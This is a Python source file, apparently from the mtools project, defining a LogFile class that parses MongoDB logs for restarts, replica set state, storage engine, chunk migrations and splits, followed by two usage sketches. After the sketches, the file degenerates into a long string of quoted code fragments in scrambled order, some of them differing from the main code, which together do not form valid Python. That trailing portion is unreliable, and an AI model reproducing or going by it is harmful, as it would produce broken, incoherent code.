    @property
    def rs_state(self):
        """Lazy evaluation of all replica set state changes."""
        if not self._num_lines:
            self._iterate_lines()
        return self._rs_state

    @property
    def binary(self):
        """Lazy evaluation of the binary name."""
        if not self._num_lines:
            self._iterate_lines()
        return self._binary

    @property
    def hostname(self):
        """Lazy evaluation of the hostname."""
        if not self._num_lines:
            self._iterate_lines()
        return self._hostname

    @property
    def port(self):
        """Lazy evaluation of the port."""
        if not self._num_lines:
            self._iterate_lines()
        return self._port

    @property
    def versions(self):
        """Return all version changes."""
        versions = []
        for v, _ in self.restarts:
            if len(versions) == 0 or v != versions[-1]:
                versions.append(v)
        return versions

    @property
    def repl_set(self):
        """Return the replSet (if available)."""
        if not self._num_lines:
            self._iterate_lines()
        return self._repl_set

    @property
    def repl_set_members(self):
        """Return the replSet members (if available)."""
        if not self._num_lines:
            self._iterate_lines()
        return self._repl_set_members

    @property
    def repl_set_version(self):
        """Return the replSet version (if available)."""
        if not self._num_lines:
            self._iterate_lines()
        return self._repl_set_version

    @property
    def repl_set_protocol(self):
        """Return the replSet protocolVersion (if available)."""
        if not self._num_lines:
            self._iterate_lines()
        return self._repl_set_protocol

    @property
    def storage_engine(self):
        """Return storage engine if available."""
        if not self._num_lines:
            self._iterate_lines()
        return self._storage_engine

    @property
    def shards(self):
        """Lazily return the shards (if available)."""
        if not self._shards:
            self._find_sharding_info()
        return self._shards

    @property
    def csrs(self):
        """Lazily return the CSRS (if available)."""
        if not self._csrs:
            self._find_sharding_info()
        return self._csrs

    @property
    def chunks_moved_to(self):
        """Lazily return the chunks moved to this shard (if available)."""
        if not self._chunks_moved_to:
            self._find_sharding_info()
        return self._chunks_moved_to

    @property
    def chunks_moved_from(self):
        """Lazily return the chunks moved from this shard (if available)."""
        if not self._chunks_moved_from:
            self._find_sharding_info()
        return self._chunks_moved_from

    @property
    def chunk_splits(self):
        """Lazily return the chunks split in this shard (if available)."""
        if not self._chunk_splits:
            self._find_sharding_info()
        return self._chunk_splits

    def next(self):
        """Get next line, adjust for year rollover, hint datetime format."""
        # use readline here because next() iterator uses internal readahead
        # buffer so seek position is wrong
        line = self.filehandle.readline()
        if isinstance(line, bytes):
            line = line.decode('utf-8', 'replace')
        if line == '':
            raise StopIteration
        line = line.rstrip('\n')

        le = LogEvent(line)

        # hint format and nextpos from previous line
        if self._datetime_format and self._datetime_nextpos is not None:
            ret = le.set_datetime_hint(self._datetime_format,
                                       self._datetime_nextpos,
                                       self.year_rollover)
            if not ret:
                # logevent indicates timestamp format has changed,
                # invalidate hint info
                self._datetime_format = None
                self._datetime_nextpos = None
        elif le.datetime:
            # gather new hint info from another logevent
            self._datetime_format = le.datetime_format
            self._datetime_nextpos = le._datetime_nextpos

        return le

    def __iter__(self):
        """
        Iterate over LogFile object.

        Return a LogEvent object for each line (generator).
        """
        le = None

        while True:
            try:
                le = self.next()
            except StopIteration:
                # end of log file, get end date
                if not self.end and self.from_stdin:
                    if le and le.datetime:
                        self._end = le.datetime

                # future iterations start from the beginning
                if not self.from_stdin:
                    self.filehandle.seek(0)

                # return (instead of raising StopIteration exception)
                # per PEP 479
                return

            # get start date for stdin input
            if not self.start and self.from_stdin:
                if le and le.datetime:
                    self._start = le.datetime

            try:
                yield le
            except StopIteration:
                return

    states = ['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2',
              'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN']

    def __len__(self):
        """Return the number of lines in a log file."""
        return self.num_lines

    def _iterate_lines(self):
        """Count number of lines (can be expensive)."""
        self._num_lines = 0
        self._restarts = []
        self._rs_state = []

        ln = 0
        for ln, line in enumerate(self.filehandle):
            if isinstance(line, bytes):
                line = line.decode("utf-8", "replace")

            if (self._has_level is None and
                    line[28:31].strip() in LogEvent.log_levels and
                    line[31:39].strip() in LogEvent.log_components):
                self._has_level = True

            # find version string (fast check to eliminate most lines)
            if "version" in line[:100]:
                logevent = LogEvent(line)
                restart = self._check_for_restart(logevent)
                if restart:
                    self._restarts.append((restart, logevent))

            if "starting :" in line or "starting:" in line:
                # look for hostname, port
                match = re.search(r'port=(?P<port>\d+).*host=(?P<host>\S+)',
                                  line)
                if match:
                    self._hostname = match.group('host')
                    self._port = match.group('port')

            # For 3.0 the "[initandlisten] options:" long entry contained
            # the "engine" field if WiredTiger was the storage engine.
            # There were only two engines, MMAPv1 and WiredTiger.
            if "[initandlisten] options:" in line:
                match = re.search(r'replSet: "(?P<replSet>\S+)"', line)
                if match:
                    self._repl_set = match.group('replSet')
                match = re.search(r'engine: "(?P<engine>\S+)"', line)
                if match:
                    self._storage_engine = match.group('engine')
                else:
                    self._storage_engine = 'mmapv1'

            # For 3.2 the "[initandlisten] options:" entry no longer
            # contains the "engine" field, so now we have to look for the
            # "[initandlisten] wiredtiger_open config:" line, which was
            # present in 3.0 as well but would now tell us definitively
            # that wiredTiger is being used.
            if "[initandlisten] wiredtiger_open config:" in line:
                self._storage_engine = 'wiredTiger'

            if "command admin.$cmd command: { replSetInitiate:" in line:
                match = re.search(r'{ _id: "(?P<replSet>\S+)", '
                                  r'members: (?P<replSetMembers>[^]]+ ])',
                                  line)
                if match:
                    self._repl_set = match.group('replSet')
                    self._repl_set_members = match.group('replSetMembers')

            # Replica set config logging in MongoDB 3.0+
            new_config = "New replica set config in use: "
            if new_config in line:
                match = re.search(r'{ _id: "(?P<replSet>\S+)", '
                                  r'version: (?P<replSetVersion>\d+), ', line)
                if match:
                    self._repl_set = match.group('replSet')
                    self._repl_set_version = match.group('replSetVersion')
                match = re.search(r', protocolVersion: '
                                  r'(?P<replSetProtocol>\d+), ', line)
                if match:
                    self._repl_set_protocol = match.group('replSetProtocol')
                match = re.search(r'members: (?P<replSetMembers>[^]]+ ])',
                                  line)
                if match:
                    self._repl_set_members = match.group('replSetMembers')

            if "is now in state" in line:
                tokens = line.split()
                # 2.6
                if tokens[1].endswith(']'):
                    pos = 4
                else:
                    pos = 5
                host = tokens[pos]
                rs_state = tokens[-1]
                state = (host, rs_state, LogEvent(line))
                self._rs_state.append(state)
                continue

            if "[rsMgr] replSet" in line:
                tokens = line.split()
                if self._hostname:
                    host = self._hostname + ':' + self._port
                else:
                    host = os.path.basename(self.name)
                host += ' (self)'
                if tokens[-1] in self.states:
                    rs_state = tokens[-1]
                else:
                    # 2.6
                    if tokens[1].endswith(']'):
                        pos = 4
                    else:
                        pos = 5
                    rs_state = ' '.join(tokens[pos:])
                state = (host, rs_state, LogEvent(line))
                self._rs_state.append(state)
                continue

        self._num_lines = ln + 1

        # reset logfile
        self.filehandle.seek(0)

    def _check_for_restart(self, logevent):
        if (logevent.thread == 'initandlisten' and
                "db version v" in logevent.line_str):
            self._binary = 'mongod'
        elif (logevent.thread == 'mongosMain' and
                ('MongoS' in logevent.line_str or
                 'mongos' in logevent.line_str)):
            self._binary = 'mongos'
        else:
            return False

        version = re.search(r'(\d\.\d\.\d+)', logevent.line_str)
        if version:
            version = version.group(1)
            return version
        else:
            return False

    def _calculate_bounds(self):
        """Calculate beginning and end of logfile."""
        if self._bounds_calculated:
            # Assume no need to recalc bounds for lifetime of a LogFile object
            return

        if self.from_stdin:
            return False

        # we should be able to find a valid log line within max_start_lines
        max_start_lines = 10
        lines_checked = 0

        # get start datetime
        for line in self.filehandle:
            logevent = LogEvent(line)
            lines_checked += 1
            if logevent.datetime:
                self._start = logevent.datetime
                self._timezone = logevent.datetime.tzinfo
                self._datetime_format = logevent.datetime_format
                self._datetime_nextpos = logevent._datetime_nextpos
                break
            if lines_checked > max_start_lines:
                break

        # sanity check before attempting to find end date
        if self._start is None:
            raise SystemExit("Error: <%s> does not appear to be a supported "
                             "MongoDB log file format" % self.filehandle.name)

        # get end datetime (lines are at most 10k,
        # go back 30k at most to make sure we catch one)
        self.filehandle.seek(0, 2)
        self._filesize = self.filehandle.tell()
        self.filehandle.seek(-min(self._filesize, 30000), 2)

        for line in reversed(self.filehandle.readlines()):
            logevent = LogEvent(line)
            if logevent.datetime:
                self._end = logevent.datetime
                break

        # if there was a roll-over, subtract 1 year from start time
        if self._end < self._start:
            self._start = self._start.replace(year=self._start.year - 1)
            self._year_rollover = self._end
        else:
            self._year_rollover = False

        # reset logfile
        self.filehandle.seek(0)
        self._bounds_calculated = True

        return True

    def _find_curr_line(self, prev=False):
        """
        Internal helper function.

        Find the current (or previous if prev=True) line in a log file
        based on the current seek position.
        """
        curr_pos = self.filehandle.tell()

        # jump back 15k characters (at most) and find last newline char
        jump_back = min(self.filehandle.tell(), 15000)
        self.filehandle.seek(-jump_back, 1)
        buff = self.filehandle.read(jump_back)
        self.filehandle.seek(curr_pos, 0)

        if prev and self.prev_pos is not None and self.prev_pos == curr_pos:
            # Number of characters to show before/after the log offset
            error_context = 300
            self.filehandle.seek(-error_context, 1)
            buff = self.filehandle.read(curr_pos)
            hr = "-" * 60
            print("Fatal log parsing loop detected trying to find previous "
                  "log line near offset %s in %s:\n\n%s\n%s\n"
                  "<--- (current log parsing offset) \n%s\n%s\n"
                  % (curr_pos, self.name, hr, buff[:error_context],
                     buff[error_context:error_context + 1], hr),
                  file=sys.stderr)
            raise SystemExit("Cannot parse %s with requested options"
                             % self.filehandle.name)
        else:
            self.prev_pos = curr_pos

        if isinstance(buff, bytes):
            buff = buff.decode("utf-8", "replace")

        newline_pos = buff.rfind('\n')
        if prev:
            newline_pos = buff[:newline_pos].rfind('\n')

        # move back to last newline char
        if newline_pos == -1:
            self.filehandle.seek(0)
            return self.next()

        self.filehandle.seek(newline_pos - jump_back + 1, 1)

        # roll forward until we find a line with a datetime
        try:
            logevent = self.next()
            while not logevent.datetime:
                logevent = self.next()
            return logevent
        except StopIteration:
            # reached end of file
            return None

    def _find_sharding_info(self):
        """Iterate over the file and find any sharding-related information."""
        self._shards = []
        self._chunks_moved_from = []
        self._chunks_moved_to = []
        self._chunk_splits = []

        prev_line = ""

        for line in self.filehandle:
            if isinstance(line, bytes):
                line = line.decode("utf-8", "replace")

            if self.binary == "mongos":
                if "Starting new replica set monitor for" in line:
                    if "[mongosMain]" in line:
                        match = re.search(r"for (?P<csrsName>\w+)/"
                                          r"(?P<replSetMembers>\S+)", line)
                        if match:
                            csrs_info = (match.group('csrsName'),
                                         match.group('replSetMembers'))
                            self._csrs = csrs_info
                    else:
                        match = re.search(r"for (?P<shardName>\w+)/"
                                          r"(?P<replSetMembers>\S+)", line)
                        if match:
                            shard_info = (match.group('shardName'),
                                          match.group('replSetMembers'))
                            self._shards.append(shard_info)
            elif self.binary == "mongod":
                logevent = LogEvent(line)

                if "New replica set config in use" in line:
                    if "configsvr: true" in line:
                        match = re.search(
                            r' _id: "(?P<replSet>\S+)".*'
                            r'members: (?P<replSetMembers>[^]]+ ])', line)
                        if match:
                            self._csrs = (
                                match.group('replSet'),
                                match.group('replSetMembers')
                            )

                if "Starting new replica set monitor for" in line:
                    match = re.search(r"for (?P<replSet>\w+)/"
                                      r"(?P<replSetMembers>\S+)", line)
                    if match:
                        if (self._csrs and
                                match.group('replSet') != self._csrs[0]):
                            self._shards.append((
                                match.group('replSet'),
                                match.group('replSetMembers')
                            ))
                        elif not self._csrs:
                            self._csrs = (
                                match.group('replSet'),
                                match.group('replSetMembers')
                            )

            if "moveChunk.from" in line:
                logevent = LogEvent(line)
                match = re.search(r'ns: "(?P<namespace>\S+)".*'
                                  r'details: { (?P<range>.*\}).*'
                                  r'to: "(?P<movedTo>\S+)".*'
                                  r'note: "(?P<note>\S+)"', line)
                if match:
                    time = logevent.datetime
                    chunk_range = match.group('range')
                    namespace = match.group('namespace')
                    moved_to = match.group('movedTo')
                    note = match.group('note')

                    if note == "success":
                        errmsg = None
                        steps = re.findall(r'(?P<steps>step \d of \d): '
                                           r'(?P<stepTimes>\d+)', line)
                    else:
                        steps = None
                        match = re.search(r'errmsg: "(?P<errmsg>.*)"', line)
                        if match:
                            errmsg = match.group('errmsg')
                        else:
                            errmsg = "Unknown"

                    chunk_migration = (time, chunk_range, moved_to, namespace,
                                       steps, note, errmsg)
                    self._chunks_moved_from.append(chunk_migration)

            if "moveChunk.to" in line:
                logevent = LogEvent(line)
                match = re.search(r'ns: "(?P<namespace>\S+)".*'
                                  r'details: { (?P<range>.*\}).*.*'
                                  r'note: "(?P<note>\S+)"', line)
                if match:
                    time = logevent.datetime
                    chunk_range = match.group('range')
                    namespace = match.group('namespace')
                    # TODO: alter this to find moved from shard name
                    # when SERVER-45770 TICKET is added
                    moved_from = "Unknown"
                    note = match.group('note')

                    if note == "success":
                        errmsg = None
                        steps = re.findall(r'(?P<steps>step \d of \d): '
                                           r'(?P<stepTimes>\d+)', line)
                    else:
                        steps = None
                        match = re.search(r':: caused by :: (?P<errmsg>\S+):',
                                          prev_line)
                        if match:
                            errmsg = match.group('errmsg')
                        else:
                            errmsg = "Unknown"

                    chunk_migration = (time, chunk_range, moved_from,
                                       namespace, steps, note, errmsg)
                    self._chunks_moved_to.append(chunk_migration)

            if "Finding the split vector for" in line:
                logevent = LogEvent(line)
                match = re.search(r'for (?P<namespace>\S+).*'
                                  r'numSplits: (?P<numSplits>\d+)', line)
                if match:
                    time = logevent.datetime
                    split_range = None
                    namespace = match.group("namespace")
                    numSplits = match.group('numSplits')
                    success = None
                    time_taken = 0
                    error = None
                    self._chunk_splits.append((time, split_range, namespace,
                                               numSplits, success,
                                               time_taken, error))
            elif "splitVector" in line:
                logevent = LogEvent(line)
                match = re.search(r'splitVector: "(?P<namespace>\S+)".*,'
                                  r' (?P<range>min:.*), max.*'
                                  r'op_msg (?P<time_taken>\d+)', line)
                if match:
                    time = logevent.datetime
                    split_range = match.group("range")
                    namespace = match.group("namespace")
                    time_taken = match.group("time_taken")
                    numSplits = 0
                    success = True
                    error = None
                    self._chunk_splits.append((time, split_range, namespace,
                                               numSplits, success,
                                               time_taken, error))
            elif "Unable to auto-split chunk" in line:
                logevent = LogEvent(line)
                match = re.search(r"chunk \[(?P<range>.*)\) "
                                  r'in namespace (?P<namespace>\S+)'
                                  r' :: caused by :: (?P<error>\S+): ', line)
                if match:
                    time = logevent.datetime
                    split_range = match.group("range")
                    namespace = match.group("namespace")
                    numSplits = 0
                    success = False
                    time_taken = 0
                    error = match.group("error")
                    self._chunk_splits.append((time, split_range, namespace,
                                               numSplits, success,
                                               time_taken, error))
            elif "jumbo" in line:
                logevent = LogEvent(line)
                match = re.search(r'migration (?P<namespace>\S+): '
                                  r'\[(?P<range>.*)\)', prev_line)
                if match:
                    time = logevent.datetime
                    split_range = match.group("range")
                    namespace = match.group("namespace")
                    numSplits = 0
                    success = False
                    time_taken = 0
                    error = "Jumbo"
                    self._chunk_splits.append((time, split_range, namespace,
                                               numSplits, success,
                                               time_taken, error))

            prev_line = line

        # reset logfile
        self.filehandle.seek(0)

    def fast_forward(self, start_dt):
        """
        Fast-forward file to given start_dt datetime obj using binary search.

        Only fast for files. Streams need to be forwarded manually, and it
        will miss the first line that would otherwise match (as it consumes
        the log line).
        """
        if self.from_stdin:
            # skip lines until start_dt is reached
            return
        else:
            # fast bisection path
            max_mark = self.filesize
            step_size = max_mark

            # check if start_dt is already smaller than the first datetime
            self.filehandle.seek(0)
            le = self.next()
            if le.datetime and le.datetime >= start_dt:
                self.filehandle.seek(0)
                return

            le = None
            self.filehandle.seek(0)

            # search for lower bound
            while abs(step_size) > 100:
                step_size = ceil(step_size / 2.)

                self.filehandle.seek(step_size, 1)
                le = self._find_curr_line()
                if not le:
                    break

                if le.datetime >= start_dt:
                    step_size = -abs(step_size)
                else:
                    step_size = abs(step_size)

            if not le:
                return

            # now walk backwards until we find a truly smaller line
            while (self.filehandle.tell() >= 2 and
                   (le.datetime is None or le.datetime >= start_dt)):
                self.filehandle.seek(-2, 1)
                le = self._find_curr_line(prev=True)
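

# ---------------------------------------------------------------------------
# Usage sketches
#
# The examples below are illustrative only and are not part of the LogFile
# API. File paths such as 'mongod.log' are hypothetical placeholders; they
# assume a MongoDB log file is available locally and that mtools is
# installed.
# ---------------------------------------------------------------------------

# A minimal sketch of basic usage: wrap an open file handle in a LogFile,
# read a few of the lazily calculated attributes, then iterate the file as
# LogEvent objects.
def _example_basic_usage(path='mongod.log'):
    """Sketch: print metadata and the first few events of a log file."""
    with open(path, 'rb') as f:
        logfile = LogFile(f)

        # bounds and metadata are calculated lazily on first access
        print("start: ", logfile.start)
        print("end:   ", logfile.end)
        print("binary:", logfile.binary)
        print("lines: ", len(logfile))

        # iteration yields a LogEvent per line (generator)
        for i, le in enumerate(logfile):
            if i >= 5:
                break
            print(le.datetime, le.line_str[:80])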
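
# A minimal sketch of time-window slicing with fast_forward(). The binary
# search repositions the file handle near the first line whose timestamp is
# >= start_dt, so the following iteration skips the bulk of the file. The
# five-minute window is an arbitrary example value; the cutoff inherits the
# log file's own timezone via the `end` property.
def _example_fast_forward(path='mongod.log'):
    """Sketch: print only events from the last five minutes of a log."""
    from datetime import timedelta

    with open(path, 'rb') as f:
        logfile = LogFile(f)
        cutoff = logfile.end - timedelta(minutes=5)

        logfile.fast_forward(cutoff)
        for le in logfile:
            if le.datetime and le.datetime >= cutoff:
                print(le.line_str)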
enumerate(self.filehandle):", "newline char if newline_pos == -1: self.filehandle.seek(0) return self.next() self.filehandle.seek(newline_pos", "expensive).\"\"\" self._num_lines = 0 self._restarts = [] self._rs_state = []", "== \"mongos\": if \"Starting new replica set monitor for\" in", "+ 1 # reset logfile self.filehandle.seek(0) def _check_for_restart(self, logevent): if", "versions(self): \"\"\"Return all version changes.\"\"\" versions = [] for v,", "available)\"\"\" if not self._shards: self._find_sharding_info() return self._shards @property def csrs(self):", "look for the \"[initandlisten] wiredtiger_open config:\" which was present in", "restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._rs_state @property def binary(self):", "There were only two engines, MMAPv1 and WiredTiger \"\"\" if", "self._repl_set = match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"', line) if match:", "'.join(tokens[pos:]) state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue self._num_lines =", "newline char jump_back = min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back, 1) buff =", "except StopIteration: return states = (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2',", "not self.start and self.from_stdin: if le and le.datetime: self._start =", "def _calculate_bounds(self): \"\"\"Calculate beginning and end of logfile.\"\"\" if self._bounds_calculated:", "= tokens[-1] state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue if", "ceil from mtools.util.input_source import InputSource from mtools.util.logevent import LogEvent class", "end(self): \"\"\" Lazy evaluation of start and end of logfile.", "all version changes.\"\"\" versions = [] for v, _ in", "storage engine if available.\"\"\" if not self._num_lines: self._iterate_lines() return self._storage_engine", "caused by :: (?P<error>\\S+): ', line) if match: time =", "would otherwise match (as it consumes the log line). \"\"\"", "format.\"\"\" # use readline here because next() iterator uses internal", "binary search. Only fast for files. 
Streams need to be", "return self._start @property def end(self): \"\"\" Lazy evaluation of start", "alter this to find moved from shard name when SERVER-45770", "if isinstance(line, bytes): line = line.decode('utf-8', 'replace') if line ==", "return self._repl_set_protocol @property def storage_engine(self): \"\"\"Return storage engine if available.\"\"\"", "# future iterations start from the beginning if not self.from_stdin:", "import os import re import sys from datetime import datetime", "None self._repl_set_protocol = None self._storage_engine = None self._datetime_format = None", "self._has_level @property def year_rollover(self): \"\"\"Lazy evaluation of the datetime format.\"\"\"", "not self._num_lines: self._iterate_lines() return self._num_lines @property def restarts(self): \"\"\"Lazy evaluation", "= None self._rs_state = None self._repl_set = None self._repl_set_members =", "'ARBITER', 'UNKNOWN']) def __len__(self): \"\"\"Return the number of lines in", "have to look for the \"[initandlisten] wiredtiger_open config:\" which was", "a line with a datetime try: logevent = self.next() while", "datetime from math import ceil from mtools.util.input_source import InputSource from", "None): raise SystemExit(\"Error: <%s> does not appear to be a", "return the chunks moved from this shard (if available)\"\"\" if", "\"mongod\": logevent = LogEvent(line) if \"New replica set config in", "Returns None for stdin input currently. \"\"\" if not self._end:", "self._num_lines: self._iterate_lines() return self._hostname @property def port(self): \"\"\"Lazy evaluation of", "= LogEvent(line) if logevent.datetime: self._end = logevent.datetime break # if", "(\"New replica set config in use: \") if new_config in", "None def _find_sharding_info(self): \"\"\" Iterate over file and find any", "15k characters (at most) and find last newline char jump_back", "available)\"\"\" if not self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from @property def chunk_splits(self):", "success, time_taken, error)) elif \"splitVector\" in line: logevent = LogEvent(line)", "= None while True: try: le = self.next() except StopIteration", "self.next() except StopIteration as e: # end of log file,", "= re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: steps =", "= 'mmapv1' \"\"\" For 3.2 the \"[initandlisten] options:\" no longer", "= -abs(step_size) else: step_size = abs(step_size) if not le: return", "# get end datetime (lines are at most 10k, #", "False def _calculate_bounds(self): \"\"\"Calculate beginning and end of logfile.\"\"\" if", "self._restarts = None self._binary = None self._timezone = None self._hostname", "self._end: self._calculate_bounds() return self._end @property def timezone(self): \"\"\"Lazy evaluation of", "time_taken = match.group(\"time_taken\") numSplits = 0 success = True error", "\"replace\") if self.binary == \"mongos\": if \"Starting new replica set", "catch one) self.filehandle.seek(0, 2) self._filesize = self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2)", "match = re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if match: time =", "self._csrs: self._find_sharding_info() return self._csrs @property def chunks_moved_to(self): \"\"\"Lazily return the", "None self._num_lines = None self._restarts = None self._binary = None", "True # find version string (fast check to eliminate most", "prev_line) if match: time = logevent.datetime split_range = match.group(\"range\") namespace", "ln + 1 # 
reset logfile self.filehandle.seek(0) def _check_for_restart(self, logevent):", "logevent = LogEvent(line) restart = self._check_for_restart(logevent) if restart: self._restarts.append((restart, logevent))", "steps, note, errmsg) self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in line: logevent =", "\"\"\" Iterate over LogFile object. Return a LogEvent object for", "break if lines_checked > max_start_lines: break # sanity check before", "self._end = logevent.datetime break # if there was a roll-over,", "self._num_lines: self._iterate_lines() return self._restarts @property def rs_state(self): \"\"\"Lazy evaluation of", "self.filehandle = filehandle self.name = filehandle.name self.from_stdin = filehandle.name ==", "= None self._has_level = None # make sure bounds are", "== '': raise StopIteration line = line.rstrip('\\n') le = LogEvent(line)", "miss the first line that would otherwise match (as it", "self.filehandle.seek(newline_pos - jump_back + 1, 1) # roll forward until", "= os.path.basename(self.name) host += ' (self)' if tokens[-1] in self.states:", "shard (if available)\"\"\" if not self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to @property", "0) if prev and self.prev_pos is not None and self.prev_pos", "characters to show before/after the log offset error_context = 300", "match = re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if match: time", "contained the \"engine\" field if WiredTiger was the storage engine.", "= line.split() if self._hostname: host = self._hostname + ':' +", "that wiredTiger is being used \"\"\" if \"[initandlisten] wiredtiger_open config:\"", "not self._timezone: self._calculate_bounds() return self._timezone @property def filesize(self): \"\"\" Lazy", "None: self._calculate_bounds() return self._year_rollover @property def num_lines(self): \"\"\" Lazy evaluation", "else: # 2.6 if tokens[1].endswith(']'): pos = 2 else: pos", "info self._datetime_format = None self._datetime_nextpos = None elif le.datetime: #", "line.decode(\"utf-8\", \"replace\") if (self._has_level is None and line[28:31].strip() in LogEvent.log_levels", "of the datetime format.\"\"\" if not self._datetime_format: self._calculate_bounds() return self._datetime_format", "used \"\"\" if \"[initandlisten] wiredtiger_open config:\" in line: self._storage_engine =", "get start datetime for line in self.filehandle: logevent = LogEvent(line)", "pos = 6 rs_state = ' '.join(tokens[pos:]) state = (host,", "lines_checked > max_start_lines: break # sanity check before attempting to", "function. 
Find the current (or previous if prev=True) line in", "\"\"\"Lazy evaluation of all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return", "(?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: shard_info = (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info)", "(?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if match: time = logevent.datetime split_range", "if self._year_rollover is None: self._calculate_bounds() return self._year_rollover @property def num_lines(self):", "if match: self._hostname = match.group('host') self._port = match.group('port') \"\"\" For", "restarts(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if not self._num_lines: self._iterate_lines()", "self._iterate_lines() return self._rs_state @property def binary(self): \"\"\"Lazy evaluation of the", "match.group('namespace') moved_to = match.group('movedTo') note = match.group('note') if note ==", "offset error_context = 300 self.filehandle.seek(-error_context, 1) buff = self.filehandle.read(curr_pos) hr", "self._restarts @property def rs_state(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if", "port(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if not self._num_lines:", "v != versions[-1]: versions.append(v) return versions @property def repl_set(self): \"\"\"Return", "self._storage_engine = match.group('engine') else: self._storage_engine = 'mmapv1' \"\"\" For 3.2", "def num_lines(self): \"\"\" Lazy evaluation of the number of lines.", "new hint info from another logevent self._datetime_format = le.datetime_format self._datetime_nextpos", "self._hostname: host = self._hostname + ':' + self._port else: host", "a datetime try: logevent = self.next() while not logevent.datetime: logevent", "replica set config in use: \") if new_config in line:", "= None self._chunks_moved_to = None self._chunk_splits = None # Track", "self._binary = 'mongod' elif logevent.thread == 'mongosMain' and ('MongoS' in", "# reset logfile self.filehandle.seek(0) self._bounds_calculated = True return True def", "\"\"\" if not self._start: self._calculate_bounds() return self._start @property def end(self):", "6 rs_state = ' '.join(tokens[pos:]) state = (host, rs_state, LogEvent(line))", "being used \"\"\" if \"[initandlisten] wiredtiger_open config:\" in line: self._storage_engine", "bisection path max_mark = self.filesize step_size = max_mark # check", "if self._end < self._start: self._start = self._start.replace(year=self._start.year - 1) self._year_rollover", "self.from_stdin: if le and le.datetime: self._start = le.datetime try: yield", "chunks_moved_from(self): \"\"\"Lazily return the chunks moved from this shard (if", "\"\"\" if \"[initandlisten] options:\" in line: match = re.search('replSet: \"(?P<replSet>\\S+)\"',", "self._iterate_lines() return self._restarts @property def rs_state(self): \"\"\"Lazy evaluation of all", "errmsg = \"Unknown\" chunk_migration = (time, chunk_range, moved_to, namespace, steps,", "binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._binary @property def", "+ ':' + self._port else: host = os.path.basename(self.name) host +=", "LogEvent(line) match = re.search(\"chunk \\[(?P<range>.*)\\) \" 'in namespace (?P<namespace>\\S+)' '", "line = line.decode('utf-8', 'replace') if line == '': raise StopIteration", "= 0 error = match.group(\"error\") self._chunk_splits.append((time, split_range, namespace, numSplits, success,", "obj using binary search. Only fast for files. 
Streams need", "in line: if \"[mongosMain]\" in line: match = re.search(\"for (?P<csrsName>\\w+)/\"", "was present in 3.0, but would now tell us definitively", "success = True error = None self._chunk_splits.append((time, split_range, namespace, numSplits,", "self._csrs = csrs_info else: match = re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line)", "self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif not self._csrs: self._csrs =", ") if \"Starting new replica set monitor for\" in line:", "self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) prev_line = line", "= (\"New replica set config in use: \") if new_config", "the chunks moved to this shard (if available)\"\"\" if not", "self.filehandle.seek(0) # search for lower bound while abs(step_size) > 100:", "self._chunk_splits = None # Track previous file position for loop", "self._chunks_moved_from @property def chunk_splits(self): \"\"\"Lazily return the chunks split in", "= 4 else: pos = 5 host = tokens[pos] rs_state", "= le._datetime_nextpos return le def __iter__(self): \"\"\" Iterate over LogFile", "def chunk_splits(self): \"\"\"Lazily return the chunks split in this shard", "before starting to iterate, # including potential year rollovers self._calculate_bounds()", "using binary search. Only fast for files. Streams need to", "len(versions) == 0 or v != versions[-1]: versions.append(v) return versions", "from shard name when SERVER-45770 TICKET is added moved_from =", "self._chunk_splits: self._find_sharding_info() return self._chunk_splits def next(self): \"\"\"Get next line, adjust", "(lines are at most 10k, # go back 30k at", "back to last newline char if newline_pos == -1: self.filehandle.seek(0)", "self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in line: logevent = LogEvent(line) match =", "self._timezone = logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos break", "def __iter__(self): \"\"\" Iterate over LogFile object. Return a LogEvent", "= 0 error = None self._chunk_splits.append((time, split_range, namespace, numSplits, success,", "the log line). 
\"\"\" if self.from_stdin: # skip lines until", "2) self._filesize = self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2) for line in", "self._shards: self._find_sharding_info() return self._shards @property def csrs(self): \"\"\"Lazily return the", "% self.filehandle.name) # get end datetime (lines are at most", "= [] self._rs_state = [] ln = 0 for ln,", "if logevent.datetime: self._start = logevent.datetime self._timezone = logevent.datetime.tzinfo self._datetime_format =", "self.filehandle.seek(0) return self.next() self.filehandle.seek(newline_pos - jump_back + 1, 1) #", "line: if \"[mongosMain]\" in line: match = re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\",", "monitor for\" in line: match = re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line)", "v\" in logevent.line_str): self._binary = 'mongod' elif logevent.thread == 'mongosMain'", "math import ceil from mtools.util.input_source import InputSource from mtools.util.logevent import", "file return None def _find_sharding_info(self): \"\"\" Iterate over file and", "\"\"\"Get next line, adjust for year rollover and hint datetime", "a Logfile object return if self.from_stdin: return False # we", "self._chunks_moved_to.append(chunk_migration) if \"Finding the split vector for\" in line: logevent", "self._repl_set_version @property def repl_set_protocol(self): 